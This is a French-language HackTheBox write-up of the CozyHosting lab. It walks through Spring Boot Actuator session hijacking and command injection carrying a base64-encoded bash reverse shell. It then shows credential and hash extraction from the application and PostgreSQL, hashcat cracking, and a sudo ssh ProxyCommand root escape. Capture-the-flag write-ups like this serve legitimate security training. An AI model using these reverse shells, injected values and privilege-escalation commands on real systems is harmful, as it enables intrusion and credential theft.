Retour au blog
HackTheBox Spring Boot Command Injection PostgreSQL Privilege Escalation

HTB - CozyHosting

Exploitation Spring Boot Actuator, session hijacking, command injection et escalade via SSH ProxyCommand.

2024-02-20 Easy HackTheBox

Reconnaissance

# /etc/hosts
10.10.11.230 cozyhosting.htb

nmap -p- --open -sV -v 10.10.11.230

Ports ouverts :

  • 22/tcp — SSH OpenSSH 8.9p1 Ubuntu
  • 80/tcp — HTTP nginx 1.18.0

Enumération Web

ffuf -u http://cozyhosting.htb/FUZZ -w wordlists/dicc.txt -mc 0-299 -fs 0

Endpoints Spring Boot Actuator découverts :

  • actuator/sessions — Sessions actives
  • actuator/mappings — Routes de l’application
  • actuator/env — Variables d’environnement

Exploitation — Session Hijacking + Command Injection

http://cozyhosting.htb/actuator/sessions
→ 08EF47D7E71ACE1ABBBF204F8E9726FF "kanderson"

Modification des cookies pour accéder à /admin. Injection de commandes via /executessh :

echo 'bash -i -p >& /dev/tcp/LHOST/4444 0>&1'|base64

nc -nlvp 4444
# POST /executessh
# host=10.10.11.230&username=x;`echo${IFS}<base64>|base64${IFS}-d|bash`

Post-exploitation

python3 -m http.server 8888
wget http://10.10.11.230:8888/cloudhosting-0.0.1.jar
unzip cloudhosting-0.0.1.jar

Extraction des credentials PostgreSQL :

grep -irE '(password|pwd|pass)[[:space:]]*=[[:space:]]*[[:alpha:]]+' *
# spring.datasource.password=Vg&nvzAQ7XxR
python3 -c 'import pty;pty.spawn("/bin/bash")'
psql -h localhost -U postgres
\c cozyhosting
select * from users;

Hash admin : $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm

hashcat -m 3200 hash rockyou.txt
# manchesterunited

ssh josh@10.10.11.230

Privilege Escalation — SSH sudo

sudo -l
# (root) /usr/bin/ssh *

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
cat /root/root.txt